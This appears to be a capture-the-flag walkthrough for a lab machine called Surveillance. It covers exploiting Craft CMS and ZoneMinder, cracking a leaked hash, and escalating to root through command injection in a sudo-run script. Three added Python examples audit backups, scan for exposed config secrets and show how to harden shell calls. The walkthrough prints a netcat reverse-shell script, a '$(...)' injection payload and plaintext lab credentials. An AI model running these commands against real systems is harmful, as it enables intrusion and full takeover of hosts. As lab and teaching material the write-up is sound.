PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
echo "10.129.230.42 surveillance.htb" >> /etc/hosts
It's Craft CMS 4.4.14.
Start googling.
Find an RCE vulnerability matching this CMS version:
CVE-2023-41892
Finally, find a PoC here:
script /dev/null -c /bin/bash
CTRL + Z
stty raw -echo; fg
Then press Enter twice, and then enter:
export TERM=xterm
This improves shell interaction (a full TTY with job control and tab completion).
Enumerate folders:
www-data@surveillance:~/html/craft/storage/backups$ ls
surveillance--2023-10-17-202801--v4.4.14.sql
surveillance--2023-10-17-202801--v4.4.14.sql.zip
www-data@surveillance:~/html/craft/storage/backups$ file surveillance--2023-10-17-202801--v4.4.14.sql
surveillance--2023-10-17-202801--v4.4.14.sql: ASCII text
Noticed a .sql file; download it.
I found a `users` table by keyword search, then traced back to the INSERT statement for it in the .sql file. Searching for 'INSERT INTO `users`' gives:
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
commit;
39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec
This looks like a password hash. Checking the user names in /etc/passwd, I found a user named "matthew".
I got the credential by cracking the hash from the .sql file with an online service.
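The real finding here is that a database backup with password hashes was sitting under the web root, and the hash was a bare 64-hex-digit digest rather than a salted, slow bcrypt string, which is why a lookup service could recover it. As an added example (not part of the write-up, and not Craft CMS code), the script below parses a mysqldump-style file for `users` rows and reports any column that looks like a password hash, so a defender can audit backups before they end up somewhere readable. The sample dump, the e-mail address and the hash (SHA-256 of the empty string) are constructed placeholders.

```python
import re

# Constructed sample dump: the shape of the Craft CMS `users` row found in
# storage/backups on the page, with a placeholder e-mail and a placeholder
# hash (SHA-256 of the empty string) instead of the real values.
SAMPLE_DUMP = """
LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Jane D','Jane','D','admin@example.htb','e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
"""

# One INSERT statement: table name plus everything up to the terminating ';'.
_INSERT = re.compile(r"INSERT INTO `(?P<table>\w+)` VALUES (?P<rows>.*?);", re.S)
# One parenthesised row; quoted strings may contain commas and parentheses.
_ROW = re.compile(r"\((?:'(?:\\.|[^'\\])*'|[^()'])*\)")
# Individual SQL literals inside a row: quoted string, NULL, or a number.
_TOKEN = re.compile(r"'(?:\\.|[^'\\])*'|NULL|-?\d+(?:\.\d+)?")


def _literal(tok):
    """Turn a SQL literal token into a Python value."""
    if tok == "NULL":
        return None
    if tok.startswith("'"):
        return tok[1:-1].replace("\\'", "'").replace("\\\\", "\\")
    return float(tok) if "." in tok else int(tok)


def parse_rows(dump, table):
    """Return the rows of every INSERT into `table` as lists of values."""
    rows = []
    for stmt in _INSERT.finditer(dump):
        if stmt.group("table") != table:
            continue
        for row in _ROW.findall(stmt.group("rows")):
            rows.append([_literal(t) for t in _TOKEN.findall(row[1:-1])])
    return rows


def classify_hash(value):
    """Recognise common password-hash encodings; None if not hash-like."""
    if not isinstance(value, str):
        return None
    if re.fullmatch(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}", value):
        return "bcrypt"            # salted, tunable cost: what you want to see
    if re.fullmatch(r"[0-9a-f]{64}", value):
        return "sha256-like"       # bare digest: no salt, cheap to look up
    if re.fullmatch(r"[0-9a-f]{32}", value):
        return "md5-like"
    return None


def find_credential_material(dump):
    """List (email, hash kind, hash) for every users row carrying a hash."""
    findings = []
    for row in parse_rows(dump, "users"):
        email = next((v for v in row if isinstance(v, str) and "@" in v), None)
        for value in row:
            kind = classify_hash(value)
            if kind:
                findings.append({"email": email, "kind": kind, "hash": value})
    return findings


if __name__ == "__main__":
    for f in find_credential_material(SAMPLE_DUMP):
        print(f"{f['email']}: {f['kind']} hash {f['hash'][:12]}...")
```

Run it against a real backup directory in a CI job or a cron task and alert on any "sha256-like" or "md5-like" result, and on any backup living under a web-served path at all; the parser is generic enough to be pointed at other tables by changing the table name passed to parse_rows.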
Try switching to user "matthew":
ssh matthew@surveillance.htb
Password: starcraft122490
Successfully switched to matthew!
Checked SUID binaries and sudo -l.
Local listening ports; no password for mysql.
Check the OS version:
matthew@surveillance:~$ cat /etc/os-release
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
Googling for a privilege escalation exploit for this version, because I remember this version is vulnerable:
CVE-2023-2640-CVE-2023-32629 (GitHub repo by g1vi, updated Aug 6, 2024)
Tried this, but it doesn't seem to work.
Try linpeas to enumerate:
╔══════════╣ Analyzing Backup Manager Files (limit 70)
-rw-r--r-- 1 root zoneminder 5265 Nov 18 2022 /usr/share/zoneminder/www/ajax/modals/storage.php
-rw-r--r-- 1 root zoneminder 1249 Nov 18 2022 /usr/share/zoneminder/www/includes/actions/storage.php
-rw-r--r-- 1 root zoneminder 3503 Oct 17 11:32 /usr/share/zoneminder/www/api/app/Config/database.php
'password' => ZM_DB_PASS,
'database' => ZM_DB_NAME,
'host' => 'localhost',
'password' => 'ZoneMinderPassword2023',
'database' => 'zm',
$this->default['host'] = $array[0];
$this->default['host'] = ZM_DB_HOST;
-rw-r--r-- 1 root zoneminder 11257 Nov 18 2022 /usr/share/zoneminder/www/includes/database.php
Got a credential:
ZoneMinderPassword2023
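What linpeas flagged is a config file that is mode 644 (readable by every local account) and contains a literal database password; the line with the bare constant ZM_DB_PASS is not the problem, the line with the quoted value is. As an added example (not part of the write-up, and not ZoneMinder or linpeas code), this Python script walks a directory, finds quoted secret assignments in PHP/INI-style configs and reports whether each file is world-readable. The fixture directory, file names and EXAMPLE_* passwords are constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# Assignment-style secrets in PHP/INI/YAML-like config: 'password' => 'x',
# $cfg['password'] = 'x', password = "x", secret: 'x'. A bare constant such
# as => ZM_DB_PASS is not a leak and is deliberately not matched.
SECRET_RE = re.compile(
    r"(?:password|passwd|secret|api_key)['\"\]]*\s*(?:=>|=|:)\s*['\"]([^'\"]+)['\"]",
    re.I,
)


def world_readable(path):
    """True if the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_tree(root):
    """Walk `root` and report every file holding a literal secret, together
    with whether any local account can read it."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for m in SECRET_RE.finditer(text):
                findings.append({
                    "path": os.path.relpath(path, root),
                    "world_readable": world_readable(path),
                    "secret": m.group(1),
                })
    return findings


def build_fixture():
    """Create a constructed temp tree mirroring the page's finding: a config
    with a quoted DB password left at mode 644, plus a correctly 0600 one."""
    root = tempfile.mkdtemp(prefix="cfg-audit-")
    os.makedirs(os.path.join(root, "api", "app", "Config"))
    leaky = os.path.join(root, "api", "app", "Config", "database.php")
    with open(leaky, "w", encoding="utf-8") as fh:
        fh.write("<?php\n'password' => ZM_DB_PASS,\n'password' => 'EXAMPLE_DB_PASSWORD',\n")
    os.chmod(leaky, 0o644)
    locked = os.path.join(root, "secrets.ini")
    with open(locked, "w", encoding="utf-8") as fh:
        fh.write("[db]\npassword = \"EXAMPLE_INI_PASSWORD\"\n")
    os.chmod(locked, 0o600)
    return root


def leaky_files(root):
    """Relative paths of files that hold a literal secret and are world-readable."""
    return sorted({f["path"] for f in audit_tree(root) if f["world_readable"]})


if __name__ == "__main__":
    fixture = build_fixture()
    for f in audit_tree(fixture):
        flag = "WORLD-READABLE" if f["world_readable"] else "ok"
        print(f"{flag:15} {f['path']}")
```

Pointed at /usr/share/zoneminder/www on the box, the same check would have flagged database.php long before an attacker ran linpeas; the usual fix is to keep the quoted value out of the file (load it from a 0640 file owned by root and the service group) rather than to chase the permission bits alone.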
What is ZoneMinder?
It is software for video monitoring via closed-circuit cameras (CCTV).
I looked into which port this software uses. It defaults to 80, but 80 is already taken by the CMS application, so 8080 is likely the port of the ZoneMinder instance.
Let's set up port forwarding:
ssh -L 1234:localhost:8080 matthew@surveillance.htb
Password: starcraft122490
Tried admin:ZoneMinderPassword2023 and admin:admin. Failed.
cd /usr/share/zoneminder/www/api/app/Config; cat * | grep -i version
The version is 1.36.32.1.
Google searching:
git clone https://github.com/rvizx/CVE-2023-26035
Exploit, get the shell.
Create a bind shell script, pwn.sh:
#!/bin/bash
nc 10.10.16.12 8888 -e sh
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/pwn.sh)' --pass=ZoneMinderPassword2023
It doesn't work; change pwn.sh to use busybox's nc for the connection:
#!/bin/bash
busybox nc 10.10.16.12 8888 -e sh
Got root!
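Two things combine in that last step: the sudo rule lets matthew run zmupdate.pl as root with free-form arguments, and the --user value evidently ends up on a shell command line, where `$(...)` is expanded. As an added example (not part of the write-up, and not ZoneMinder's code), the Python below shows the same defect and its fix side by side: a command string handed to `shell=True` versus an argv list with no shell, plus an allow-list on the username. The helper names are hypothetical, `echo` stands in for the real work, and the substituted command only prints a marker.

```python
import re
import subprocess

# Constructed inputs. The second carries shell command substitution; the
# substituted command only prints a marker so the effect is visible.
NORMAL_USER = "zmuser"
SUBSTITUTION_USER = "$(echo SUBSTITUTED)"

# Allow-list for database user names: short, and only safe characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}")


def report_user_via_shell(user):
    """Vulnerable pattern: the argument is pasted into a command line that
    /bin/sh parses, so $(...), backticks, ; and | inside `user` are
    interpreted. (Hypothetical stand-in for a helper script.)"""
    cmd = f"echo db-user={user}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def report_user_argv(user):
    """Hardened: an argv list with no shell, so the value reaches the child
    program byte-for-byte and nothing in it is expanded."""
    return subprocess.run(["echo", f"db-user={user}"], capture_output=True, text=True).stdout.strip()


def is_valid_username(user):
    """Allow-list check, applied before the value goes anywhere."""
    return USERNAME_RE.fullmatch(user) is not None


def report_user_hardened(user):
    """Both defences together: reject anything outside the allow-list, then
    call without a shell."""
    if not is_valid_username(user):
        raise ValueError(f"rejected username {user!r}")
    return report_user_argv(user)


if __name__ == "__main__":
    print("shell string :", report_user_via_shell(SUBSTITUTION_USER))
    print("argv list    :", report_user_argv(SUBSTITUTION_USER))
    print("hardened     :", report_user_hardened(NORMAL_USER))
```

Either defence alone closes this instance: the allow-list rejects the string outright, and the argv call passes it through uninterpreted so the marker never prints. The sudo side deserves the same attention as the script: a rule that lets an unprivileged account run a root-owned script with arbitrary arguments turns any argument-handling bug in that script into root, so such rules should pin the arguments or be removed.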